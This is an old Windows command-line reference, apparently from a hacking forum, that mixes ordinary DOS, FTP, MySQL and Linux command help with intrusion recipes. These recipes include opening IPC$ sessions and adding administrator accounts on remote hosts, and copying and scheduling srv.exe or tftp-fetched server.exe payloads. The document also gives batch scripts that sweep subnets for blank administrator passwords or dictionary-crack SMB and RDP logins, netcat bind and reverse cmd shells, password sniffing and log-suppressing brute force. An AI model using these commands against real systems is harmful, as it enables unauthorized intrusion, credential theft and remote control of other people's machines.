2006-11-03
Complete DOS Command Reference (classic collection)
net use \\ip\ipc$    establish an IPC$ connection to ip
net use h: \\ip\c$    map the remote host's C: drive locally as H:
net use \\ip\ipc$ /del    delete the IPC$ connection
net use h: /del    delete the mapping of the remote drive to local H:
net user username password /add    create a user
net user guest /active:yes    activate the guest user
net user    list which users exist
net user accountname    view the properties of an account
net localgroup administrators username /add    add the user to the Administrators group so that it has administrator privileges; note: the group is "administrators", plural, with an s
net start    list which services are running
net start servicename    start a service (e.g. net start telnet, net start schedule)
net stop servicename    stop a service
net time \\targetip    view the remote host's time
net time \\targetip /set    synchronise the local computer's time with the target host's time; add /yes to skip the confirmation prompt
net view    view which shares are open on the local LAN
net view \\ip    view which shares the remote host has open
net config    display the system's network settings
net logoff    disconnect connected shares
net pause servicename    pause a service
net send ip    send a message to the remote host
net share ipc$    enable the ipc$ share
net share ipc$ /del    delete the ipc$ share
net share c$ /del    delete the C: share
net user guest 12345    after logging in as guest, change its password to 12345
net password password    change the system login password
netstat -a    view which ports are open; netstat -an is the common form
netstat -n    view network connections by port; netstat -an is the common form
netstat -v    view work in progress
netstat -p protocol    e.g. netstat -p tcp/ip shows the usage of a given protocol (here tcp/ip)
netstat -s    view usage statistics for all protocols in use
nbtstat -A ip    if one of the remote host's ports 136-139 is open, shows the name of the user who last logged on there (the name preceding <03>); note: the -A parameter must be uppercase
tracert -parameter ip (or computer name)    trace the route taken by packets to the host
ping ip (or domain)    send packets of the default size of 32 bytes to the remote host
ping -t -l 65550 ip    "ping of death" (sending packets larger than 64K continuously is the ping of death)
ipconfig (winipcfg)    on Windows NT and XP (Windows 95/98) show the local IP address; ipconfig accepts further parameters
kill -F processname    with -F, forcibly end a process (an add-on system tool, not installed by default; found in the Support\Tools folder of the installation media)
del -F filename    with -F, read-only files can be deleted; /AR, /AH, /AS, /AA delete read-only, hidden, system and archive files respectively; /A-R, /A-H, /A-S, /A-A delete all files except read-only, hidden, system and archive files respectively
del /S /Q directory    or rmdir /S /Q directory: /S deletes the directory together with all its subdirectories and files; /Q suppresses the system's confirmation prompt and deletes directly (both commands have the same effect)
move drive:\path\filename destpath\newname    move a file; with /y the prompt about an existing file of the same name in the destination is suppressed and the file is overwritten directly
fc one.txt two.txt > 3st.txt    compare two files and write the differences to 3st.txt; > and >> are redirection operators
at id    start a registered scheduled task by its id
at /delete    stop all scheduled tasks; with /yes no confirmation is needed
at id /delete    stop one registered scheduled task
at    list all scheduled tasks
at \\ip time program (or command) /r    run a program on the remote host at the given time and restart the computer
finger username@host    view which users have logged in recently
telnet ip port    log in to a remote server; the default port is 23
open ip    connect to ip (a command used inside telnet after login)
telnet    typing telnet on the local machine enters the local telnet client
copy path\file1 path\file2 /y    copy file1 to the given directory as file2; /y suppresses the prompt to overwrite an existing file
copy c:\srv.exe \\ip\admin$    copy the local c:\srv.exe to the remote host's admin$ share
copy 1st.jpg /b + 2st.txt /a 3st.jpg    hide the contents of 2st.txt inside 1st.jpg, producing the new file 3st.jpg; note: 2st.txt must begin with three blank lines; /b means binary file, /a means ASCII file
copy \\ip\admin$\srv.exe c:\    or copy \\ip\admin$\*.* c:\: copy srv.exe (or all files) from the remote admin$ share to the local C:
xcopy source-files-or-tree destination\dirname    copy files and directory trees; with /Y there is no prompt before overwriting identical files
tftp -i own-ip (when going through a compromised host, use that host's ip) get server.exe c:\server.exe    after logging in, download server.exe from own-ip to the target host's c:\server.exe
tftp -i remote-ip put c:\server.exe    after logging in, upload the local c:\server.exe to the host
ftp ip port    upload files to a server or perform file operations; the default port is 21. bin switches to binary transfer (for executables); the default is ASCII transfer (for text files)
route print    display the IP routing table, mainly showing Network Address, Netmask, Gateway Address and Interface
arp    view and manipulate the ARP cache; ARP is address resolution, responsible for resolving an IP address to a physical MAC address. arp -a shows all entries
start program-or-command /max or /min    open a new window and run a program or command maximised (minimised)
mem    check CPU usage
attrib filename (dirname)    view the attributes of a file (directory)
attrib filename -A -R -S -H or +A +R +S +H    remove (add) the archive, read-only, system and hidden attributes of a file; + adds the attribute
dir    list files; parameters: /Q show which user owns each file and directory, /T:C show creation time, /T:A show last access time, /T:W show last modification time
date /t, time /t    with /t only the current date and time are displayed, without prompting for new ones
set name=value    set an environment variable
set    display all current environment variables
set p (or other characters)    display all environment variables whose names start with p (or the given characters)
pause    pause a batch program and display "Press any key to continue ...."
if    conditional processing in a batch program (more in the section on the if command and variables)
goto label    direct cmd.exe to the line in the batch program carrying the label (the label must be on its own line and start with a colon)
call path\batchfile    call another batch program from a batch program (see call /? for more)
for    execute a specific command for each file in a set of files (more in the section on the for command and variables)
echo on or off    turn echo on or off; echo alone displays the current echo setting
echo text    display text on the screen
echo text >> pass.txt    append text to the file pass.txt
color value    set the cmd console foreground and background colour; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = grey, 9 = light blue, A = light green, B = pale light green, C = light red, D = light purple, E = light yellow, F = bright white
prompt name    change the command prompt displayed by cmd.exe (e.g. change C:\, D:\ uniformly to EntSky\)
ver    display version information in a DOS window
winver    pop up a window showing version information (memory size, system version, patch version, computer name)
format drive /FS:type    format a disk; type: FAT, FAT32, NTFS; e.g. format D: /FS:NTFS
md dirname    create a directory
replace sourcefile target-directory    replace files
ren oldname newname    rename a file
tree    display the directory structure as a tree; with -f the file names in each folder are listed too
type filename    display the contents of a text file
more filename    display output one screen at a time
doskey command-to-lock=characters
doskey command-to-unlock=    locking of DOS commands (edits the command line, recalls Win2K commands and creates macros). E.g. lock the dir command: doskey dir=entsky (doskey dir=dir cannot be used); unlock: doskey dir=
taskmgr    bring up the Task Manager
chkdsk /F D:    check disk D and display a status report; /F also repairs errors on the disk
tlntadmn    telnet service administration; type tlntadmn, choose 3, then choose 8, and the telnet service's default port 23 can be changed to any other port
exit    exit cmd.exe or the current batch script; with /B the current batch script is exited rather than cmd.exe
path path\executable    set a search path for executables
cmd    start a Win2K command interpreter window; parameters: /e:off, /e:on disable or enable command extensions; see cmd /? for details
regedit /s regfile    import a registry file; /S means silent import with no prompts
regedit /e regfile    export the registry to a file
cacls filename parameters    display or modify a file's access control list (ACL), for NTFS; parameters: /D user denies the user access; /P user:perm replaces the user's access rights; /G user:perm grants the user access rights; perm can be N none, R read, W write, C change (write), F full control; e.g. cacls D:\test.txt /D pub denies user pub access to d:\test.txt
cacls filename    view the file's access permission list
REM text    add a comment in a batch file
netsh    view or change the local network configuration
IIS service commands:
iisreset /reboot    reboot the Win2K machine (a message saying the system will reboot appears)
iisreset /start or /stop    start (stop) all Internet services
iisreset /restart    stop and restart all Internet services
iisreset /status    display the status of all Internet services
iisreset /enable or /disable    enable (disable) restarting of Internet services on the local system
iisreset /rebootonerror    reboot the computer if an error occurs when starting, stopping or restarting the Internet services
iisreset /noforce    if the Internet services cannot be stopped, do not forcibly terminate them
iisreset /timeout val    timeout in seconds; if the Internet services have not stopped by then and /rebootonerror was given, the computer reboots; defaults: 20 seconds for restart, 60 seconds for stop, 0 seconds for reboot
FTP commands (see the detailed description below):
The ftp command line format is:
ftp -v -d -i -n -g [hostname]
-v    display all responses from the remote server
-d    use debugging mode
-n    suppress ftp auto-login, i.e. do not use the .netrc file
-g    disable filename globbing
help [command] or ? [command]    view help
bye or quit    terminate the FTP process on the host and exit ftp
pwd    show the current directory on the remote host
put or send local-file [remote-file]    send a local file to the remote host
get or recv remote-file [local-file]    fetch a file from the remote host to the local host
mget [remote-files]    receive several files from the remote host
mput local-files    send several local files to the remote host
dir or ls [remote-directory] [local-file]    list the files in the current remote directory; if a local file is given, the result is written to it
ascii    set the transfer mode to ASCII (default)
bin or image    set the transfer mode to binary image
bell    ring the bell after each completed file transfer
cdup    return to the parent directory
close    end the ftp session with the remote server (the counterpart of open)
open host [port]    create a connection to the given ftp server; a port may be specified
delete    delete a file on the remote host
mdelete [remote-files]    delete a group of files
mkdir directory-name    create a directory on the remote host
rename [from] [to]    rename a file on the remote host
rmdir directory-name    delete a directory on the remote host
status    show the current status
system    display the remote host's system type
user user-name [password] [account]    log in to the remote host again as another user
open host [port]    re-establish a connection
prompt    toggle interactive prompting
macdef    define a macro
lcd    change the local host's working directory; with no argument, change to the current user's home directory
chmod    change file permissions on the remote host
case    when on, file names copied with mget are converted to all lowercase on the local machine
cd remote-dir    enter a directory on the remote host
cdup    go to the parent of the current remote directory
!    run an interactive shell on the local machine; exit returns to the ftp environment; e.g. ! ls *.zip
MySQL commands:
mysql -h hostaddress -u username -p password    connect to MySQL; on a fresh install the superuser root has no password
(example: mysql -h110.110.110.110 -uroot -p123456
note: there must be no space between -u and the user name, and likewise for the other options)
exit    exit MySQL
mysqladmin -u username -p oldpassword password newpassword    change the password
grant select on database.* to username@loginhost identified by "password";    (note: this and the following commands are run inside the MySQL environment, so they end with a semicolon as the command terminator)
show databases;    display the list of databases. Initially there are only two: mysql and test. The mysql database holds MySQL's essential system information; changing passwords and adding users is actually done through this database.
use mysql;
show tables;    show the tables in the database
describe tablename;    display the structure of a table
create database databasename;    create a database
use databasename;
create table tablename (field list);    create a table
drop database databasename;
drop table tablename;    delete a database, delete a table
delete from tablename;    clear the records in a table
select * from tablename;    display the records in a table
mysqldump --opt school > school.bbb    export a database (run from DOS in the mysql bin directory); note: backs up the database school to the file school.bbb; school.bbb is a text file and the name is arbitrary; open it and you will find something new.
New commands under Windows 2003 (practical section):
shutdown /parameters    shut down or restart the local or a remote host.
Parameters: /S shut down the host, /R restart the host, /T number set the delay, from 0 to 180 seconds, /A cancel a shutdown, /M \\IP specify the remote host.
Example: shutdown /r /t 0    restart the local host immediately (no delay)
taskkill /parameters process-name or pid    terminate one or more tasks and processes.
Parameters: /PID terminate the process with that pid (the tasklist command can be used to obtain the pid), /IM terminate the process with that image name, /F forcibly terminate the process, /T terminate the specified process and any child processes it started.
tasklist    show the processes running on the local or a remote host, the services, the services belonging to each process, and the process identifiers (PID).
Parameters: /M list the dll files loaded by each process, /SVC show the service corresponding to each process; with no parameter only the current processes are listed.
Basic Linux commands (case-sensitive):
uname    display version information (like Win2K's ver)
dir    display the files in the current directory; ls -al shows them including hidden files (like Win2K's dir)
pwd    show the current directory
cd    cd .. goes back to the parent directory; note the space between cd and ..; cd / returns to the root directory
cat filename    view the contents of a file
cat > abc.txt    write content into the file abc.txt
more filename    display a text file one page at a time
cp    copy files
mv    move files
rm filename    delete a file; rm -r dirname deletes a directory and its subdirectories
mkdir dirname    create a directory
rmdir    remove a directory; the directory must contain no files
chmod    set access permissions on a file or directory
grep    search for a string in a file
diff    compare files
find    search for files
date    current date and time
who    show who is currently using the same machine, with time and place
w    show details of who is currently logged in to the machine
whoami    show your own account name
groups    show a user's groups
passwd    change the password
history    view the commands previously run
ps    display process status
kill    stop a process
gcc    hackers often use it to compile files written in C
su    switch to the specified user
telnet IP    connect to the remote host (like Win2K); when bash$ appears the connection succeeded
ftp    connect to an ftp server (like Win2K)
Appendix: batch commands and variables
1: for command and variables. Basic format:
FOR /parameter %variable IN (set) DO command [command_parameters]
%variable: specifies a single-letter replaceable parameter, e.g. %i; when defining a variable use %%i, when referencing it use %i%; variable names are case-sensitive (%i is not equal to %I).
Each batch file can handle ten variables, %0 to %9, where %0 defaults to the batch file name, %1 defaults to the first value entered, and by analogy %2 to %9 refer to the 2nd to 9th values entered; example: net use \\ip\ipc$ pass /user:user, where ip is %1, pass is %2 and user is %3
(set): specifies a file or a group of files; wildcards may be used, e.g. (D:\user.txt), (1 1 254) and (1 -1 254)
command: the command to execute on each file, e.g. net use; to execute several commands, separate them with &
command_parameters: parameters or switches for the given command
IN (set): take values from (set); DO command: execute the command
Parameters: /L means (set) is an incremental range; /F means values are taken from a file until the end of the file is reached, e.g. (d:\pass.txt).
Example usage:
@echo off
echo usage: test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >> test.txt & net use \\%1.%%G /user:administrator | find
Description: for the specified class C segment, tries to establish an IPC$ connection with a blank administrator password to each of the 254 addresses in turn; if it succeeds, the IP is stored in test.txt.
/L means incremental (i.e. from 1 to 254 or 254 to 1); the first three octets of the IP, *.*.*, are entered as the batch default %1; %%G is the variable (the last octet of the ip); & separates the echo and net use commands; | pipes the result of establishing the ipc$ connection into find to check whether %G gives a valid full IP; (1 1 254) means start value, increment, end value.
@echo off
echo usage: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
Save as ok.bat. Description: enter an IP; the dictionary d:\pass.dic is used to crack the passwords of the users in d:\user.dic, taken one at a time until the end of the file. %%i is the user name; %1 is the entered IP (default).
2: if command and variables. Basic format:
IF [not] errorlevel number command    the condition is true if the last program run returned an exit code equal to or greater than the given number
Example: IF errorlevel 0 command means that if the previously executed program returned 0, the command that follows is executed; IF not errorlevel 1 command means that if the return value of the previously executed program is not 1, the following command is executed.
0 means found and executed successfully (true); 1 means not found and not executed (false).
IF [not] string1==string2 command    if the given text strings match (i.e. string1 equals string2), the following command is executed.
IF [not] errorlevel number command else command, or IF [not] string1==string2 command else command, or IF [not] exist filename command else command: the added "else command" means that when the preceding condition does not hold, the command after else is run. Note: else must be on the same line as the if. When the del command is used, the whole del command must be enclosed in parentheses, because del executes only when it is on a line of its own; enclosed in parentheses it can share a line with the others. Example: IF exist test.txt. (del test.txt.) else echo test.txt.missing
1, nc.exe (the "Swiss army knife"):
Parameters:
-h    show help
-d    background (detached) mode
-e prog    run the program after connecting, with its input and output redirected over the connection [dangerous]
-i secs    delay interval
-l    listen mode, for inbound connections
-L    listen mode; keeps listening and accepting connections even after the client disconnects, until Ctrl+C
-n    IP addresses only, no domain name resolution
-o file    record the transmitted data to a file in hex
-p port    local port number
-r    random local and remote ports
-t    answer Telnet negotiation
-u    UDP mode
-v    verbose output; use -vv for more detail
-w secs    timeout for connects and final reads
-z    zero-I/O mode (used for scanning)
Basic usage:
nc -nvv 192.168.0.1 80    connect to port 80 of host 192.168.0.1
nc -l -p 80    listen on the local machine's TCP port 80
nc -nvv -w2 -z 192.168.0.1 80-1024    scan ports 80-1024 of 192.168.0.1
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe    bind a cmd shell to the remote host's TCP port 5354
nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354    bind a cmd shell and connect it back to port 5354 of 192.168.0.2 (reverse connection)
Advanced usage:
nc -L -p 80    honeypot use 1: open and keep listening on port 80 until Ctrl+C
nc -L -p 80 > c:\log.txt    honeypot use 2: open and keep listening on port 80 until Ctrl+C, writing the resulting output to c:\log.txt
nc -L -p 80 with a redirected command; @dir c:\winnt >> d:\log.txt means: run dir silently and append the results to d:\log.txt
The difference between > and >>:
e.g. @dir c:\winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt; run each command twice and compare: with >> the result of the second run is appended and both results are kept, whereas with > only one result remains, because the second overwrites the first.
2, scanning tool: xscan.exe
Basic format
xscan -host [start-ip]-[end-ip] [scan options] [other options]
Scan options:
-port    detect the state of commonly used service ports
-ftp    detect weak FTP passwords
-pub    detect anonymous user write access on FTP services
-pop3    detect weak POP3 server passwords
-smtp    detect SMTP server vulnerabilities
-sql    detect weak SQL Server passwords
-smb    detect weak NT server passwords
-iis    detect IIS encoding/decoding vulnerabilities
-cgi    detect CGI vulnerabilities
-nasl    load Nessus Attack Scripting Language tests
-all    run all of the above tests
Other options
-i adapter-number    set the network adapter; -l lists all network adapters
-v    show detailed scan progress
-p    skip hosts that do not respond to ping
-o    skip hosts on which no open ports are detected
-t threads,hosts    specify the maximum number of concurrent threads and concurrent hosts; the defaults are 100,10
-log filename    specify the scan report file name (suffix TXT or HTML)
Usage examples
xscan -host 192.168.1.1-192.168.255.255 -all -active -p    test all hosts in the 192.168.1.1-192.168.255.255 range for all vulnerabilities, skipping hosts that do not respond
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o    test the hosts in the 192.168.1.1-192.168.255.255 range for port status and NT weak passwords, with at most 150 concurrent threads, skipping hosts with no open ports detected
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o    test the hosts listed in hostlist.txt for port status and CGI vulnerabilities, 5 hosts at a time, showing detailed progress and skipping hosts with no open ports detected
3, command-line sniffer: xsniff.exe
Captures FTP/SMTP/POP3/HTTP passwords on the LAN
Parameters
-tcp    output TCP packets
-udp    output UDP packets
-icmp    output ICMP packets
-pass    filter for password information
-hide    run in the background
-host    resolve host names
-addr ip-address    filter by IP address
-port port    filter by port
-log filename    output to a file
-asc    output in ASCII
-hex    output in hex format
Usage examples
xsniff.exe -pass -hide -log pass.log    sniff passwords in the background and store the password information in the file pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1    sniff tcp and udp traffic, filter on 192.168.1.1 and output in ASCII
4, terminal services password cracker: tscrack.exe
Parameters
-h    show usage help
-v    show version information
-s    show the decryption capability on screen
-b    beep
-t    use multiple connections (multiple threads)
-N    prevent system log entries on the targeted server
-U    uninstall and remove the tscrack components
-f    use the password following -f
-F    interval (frequency)
-l    use the user name following -l
-w    use the password dictionary following -w
-p    use the password following -p
-D    login main page
Usage example
tscrack 192.168.0.1 -l administrator -w pass.dic    crack the remote host's administrator login password using the dictionary file
tscrack 192.168.0.1 -l administrator -p 123456    log in to the remote host 192.168.0.1 as administrator with the password 123456
@if not exist ipcscan.txt goto noscan
@for /f
:noscan
@echo 3389.txt no find or scan faild
(① saved as 3389.bat) (assuming a list of host IPs with port 3389 open, obtained with SuperScan or another scanner, has been saved in 3389.txt)
3389.bat: take each IP from 3389.txt in turn and run hack.bat with it
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >> rouji.txt
:noscan
@echo tscrack.exe not find or scan faild
(② saved as hack.bat) (run 3389.bat; 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe must be in the same directory; then wait for the results)
cut.cmd: runs tscrack.exe with the dictionary against the administrator password of every host in 3389.txt and stores the cracking results in rouji.txt.
5, Others:
Shutdown.exe
Shutdown \\IP-address t:20    shut down the remote NT host after 20 seconds (Windows 2003 ships with this tool; to use it under Windows 2000, download the tool; the Windows 2003 DOS command is described in detail above)
fpipe.exe (TCP port redirection tool), described in detail in part two (port redirection to bypass firewalls)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn    when someone scans your port 80, what they get back is entirely the information of the host www.sina.com.cn
fpipe -l 23 -s 88 -r 23 target-ip    redirect Telnet requests arriving at the local port 23 through local port 88 to port 23 of the target IP (the connection to the target IP's Telnet is made from local port 88); then telnet 127.0.0.1 (the local IP) connects through to port 23 of the target IP.
OpenTelnet.exe (tool to remotely enable telnet)
opentelnet.exe IP account password ntlm-authentication telnet-port    (no need to upload ntlm.exe to defeat Microsoft's authentication) directly enables the telnet service on the remote side; afterwards telnet ip can be used to connect to it.
NTLM authentication: 0: do not use NTLM authentication; 1: try NTLM authentication first and fall back to user name and password if it fails; 2: use only NTLM authentication.
ResumeTelnet.exe (companion tool to OpenTelnet)
resumetelnet.exe IP account password    after using Telnet to connect to the other side, use this command to restore the remote side's Telnet settings; it also closes the Telnet service.
6, FTP commands in detail:
The FTP command is one of the most frequently used commands among Internet users; a thorough grasp and skilled use of ftp's internal commands greatly helps the user and pays off many times over. If you want to learn to use FTP to download in the background, you have to learn the FTP commands.
The ftp command line format is:
ftp -v -d -i -n -g [hostname], where
-v shows all responses from the remote server;
-n suppresses ftp auto-login, i.e. the .netrc file is not used;
-d uses debugging mode;
-g disables filename globbing.
FTP's internal commands are as follows (items in brackets are optional):
1. ![cmd [args]]: run an interactive shell on the local machine; exit returns to the ftp environment, e.g. !ls *.zip
2. $ macro-name [args]: run the macro defined as macro-name.
3. account [password]: provide the additional password required to access system resources after a successful login to the remote system.
4. append local-file [remote-file]: append the local file to the file on the remote host; if the remote file name is not given, the local file name is used.
5. ascii: use ASCII transfer mode.
6. bell: ring the bell once after each command completes.